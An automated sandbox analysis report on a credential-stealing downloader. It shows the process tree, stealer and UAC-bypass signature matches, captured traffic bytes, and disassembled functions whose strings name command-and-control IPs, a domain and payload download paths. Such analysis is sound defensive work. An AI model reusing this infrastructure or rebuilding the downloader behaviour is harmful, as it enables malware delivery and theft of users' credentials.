Apr 25, 2024 09:04:34.199632883 CEST	1289	IN	Data Raw: 3b 46 10 76 04 85 c0 75 9b 8b 4e 10 3b c1 77 19 89 46 10 83 7e 14 10 72 08 8b 0e c6 04 01 00 eb 14 8b ce c6 04 01 00 eb 0c 2b c1 8b ce 6a 00 50 e8 ff fd ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc Data Ascii: ;FvuN;wF~r+jPMdY_^[]UAPuuuu;y]3]UjhpFdPSVWlG3PEdeuEv'^;v<+
Apr 25, 2024 09:04:34.199646950 CEST	1289	IN	Data Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00 Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
Apr 25, 2024 09:04:34.405992031 CEST	1289	IN	Data Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF

Target ID:	0
Start time:	09:03:51
Start date:	25/04/2024
Path:	C:\Users\user\Desktop\g77dRQ1Csm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\g77dRQ1Csm.exe"
Imagebase:	0x400000
File size:	425'985 bytes
MD5 hash:	41DE8E3E7412B6E97B60FDBFDD24B0BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1773870952.0000000005DF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:03:58
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u42w.0.exe"
Imagebase:	0x400000
File size:	279'040 bytes
MD5 hash:	A0E6719CEB3DC236283AB59B7F39B058
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2090299966.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 43%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:04:03
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u42w.2\run.exe"
Imagebase:	0x690000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:04:03
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:04:03
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	09:04:05
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u42w.3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u42w.3.exe"
Imagebase:	0x400000
File size:	4'866'096 bytes
MD5 hash:	397926927BCA55BE4A77839B1C44DE6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.1772107020.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs Detection: 3%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:04:07
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1180
Imagebase:	0x4c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:04:26
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Imagebase:	0x173ee6e0000
File size:	59'721'128 bytes
MD5 hash:	8E9C467EAC35B35DA1F586014F29C330
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.1978341064.00000173EE71B000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	09:04:27
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u42w.2\run.exe"
Imagebase:	0x690000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:04:27
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xc20000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:04:27
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:04:27
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	09:04:34
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:04:34
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:04:34
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"
Imagebase:	0xab0000
File size:	545'792 bytes
MD5 hash:	6C93FC68E2F01C20FB81AF24470B790C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 21%, ReversingLabs Detection: 38%, Virustotal, Browse
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	09:04:34
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 2332
Imagebase:	0x4c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	09:04:44
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xcb0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	2.5%
Signature Coverage:	12.9%
Total number of Nodes:	1115
Total number of Limit Nodes:	16

Executed Functions

Function 0042676C Relevance: 51.9, APIs: 16, Strings: 13, Instructions: 1148
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00426771
WSAStartup.WS2_32(00000202,?), ref: 004273FD
socket.WS2_32(00000002,00000001,00000006), ref: 00427413
WSACleanup.WS2_32 ref: 0042742D
gethostbyname.WS2_32(00000000), ref: 00427441
htons.WS2_32(?), ref: 00427473
connect.WS2_32(00000000,?,00000010), ref: 00427484
send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
recv.WS2_32(?,?,00000000,00000000), ref: 00427720
recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
WSACleanup.WS2_32 ref: 004277E6
closesocket.WS2_32(?), ref: 004277ED

Strings

HTTP/1.1 200 OK, xrefs: 0042678D, 0042683A, 0042754B
HTTP/1.1, xrefs: 00426B5E, 00426BBC, 00426BD3
GET , xrefs: 00426AF5, 00426B17, 00426B31
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 , xrefs: 00426D1E, 00426FEC, 00427003
Transfer-Encoding, xrefs: 0042690B, 004269C9, 004275E7
Host: , xrefs: 00426BF2, 00426C2C, 00426C43
chunked, xrefs: 004269E7, 00426A2D, 004275F8
POST , xrefs: 00426AA7, 00426AD5, 00426B39
/ping.php?substr=%s, xrefs: 0042677D
User-Agent: , xrefs: 00426C73, 00426CF5, 00426D0C
(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36, xrefs: 00427015, 0042729B, 004272B2
Content-Length, xrefs: 00426853, 004268ED, 004275AB
185.172.128.228, xrefs: 0042677C

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
API String ID: 791229064-1542616328
Opcode ID: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
Opcode Fuzzy Hash: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00424A0E Relevance: 48.6, APIs: 2, Strings: 25, Instructions: 1388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4

Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Strings

.exe, xrefs: 004258B1, 004258D3
sub=([\w-]{1,255}), xrefs: 00424AA2
/1/Package.zip, xrefs: 00425A14, 00425AAE, 00425B08
P, xrefs: 00425EE3
five, xrefs: 00424C22, 00424C49
SOFTWARE\BroomCleaner, xrefs: 004250F1, 004251E5
/BroomSetup.exe, xrefs: 00425DE7, 00425E8D, 00425EDB
.zip, xrefs: 00425B5D, 00425B7F
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 00424DB6, 00424F4C, 00424F65
\run.exe, xrefs: 00425BD0, 00425C28
P, xrefs: 004250AB
185.172.128.90, xrefs: 00424FB3, 0042504D, 0042509B
Installed, xrefs: 004251FF, 0042525D
185.172.128.228, xrefs: 00425D21, 00425DCD, 00425ED2
note.padd.cn.com, xrefs: 00425942, 004259FA, 00425AFF
P, xrefs: 004254F5
185.172.128.203, xrefs: 004255F7, 0042569D, 0042583F
P, xrefs: 00425855
185.172.128.59, xrefs: 0042553C, 004255D6, 0042584D
/timeSync.exe, xrefs: 0042575F, 004257F2, 00425860
/ping.php?substr=%s, xrefs: 00425387, 0042545D, 00425475
P, xrefs: 00425B10
/syncUpd.exe, xrefs: 004256BC, 0042573E, 0042586F
.exe, xrefs: 00425F26, 00425F48
185.172.128.228, xrefs: 004252C0, 00425366, 004254E5

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$five$note.padd.cn.com$sub=([\w-]{1,255})
API String ID: 2531350358-1954608908
Opcode ID: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
Opcode Fuzzy Hash: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE

Uniqueness

Uniqueness Score: -1.00%

Function 0042628B Relevance: 12.3, APIs: 8, Instructions: 275
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 004262AD
CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
String ID:
API String ID: 3070066007-0
Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
ExitProcess.KERNEL32 ref: 00413A21

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48

Uniqueness

Uniqueness Score: -1.00%

Function 02F67D8E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02F67DB6
Module32First.KERNEL32(00000000,00000224), ref: 02F67DD6

Memory Dump Source

Source File: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F67000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f67000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 2d402ed020165ce28c99d6a1cd2321347a2c863985980662354ac1bf5cd7a9cb
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: D3F062365007116BD7203AB59C8DBBAB6ECEF4966CF200929F743910C0DB70E8458A61

Uniqueness

Uniqueness Score: -1.00%

Function 0041A242 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

GetLastError.KERNEL32 ref: 0041A356
__dosmaperr.LIBCMT ref: 0041A35D
GetFileType.KERNEL32(00000000), ref: 0041A369
GetLastError.KERNEL32 ref: 0041A373
__dosmaperr.LIBCMT ref: 0041A37C
CloseHandle.KERNEL32(00000000), ref: 0041A39C
CloseHandle.KERNEL32(?), ref: 0041A4E6
GetLastError.KERNEL32 ref: 0041A518
__dosmaperr.LIBCMT ref: 0041A51F

Strings

H, xrefs: 0041A4A4

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
Opcode Fuzzy Hash: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
Opcode Fuzzy Hash: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0315003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0315024D

Strings

cess, xrefs: 0315018D
kernel32.dll, xrefs: 0315008F, 03150095

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 4f59c4d1c205a1665d409fb5751508bf9ab6107c3b516c1f4e712572a114aec7
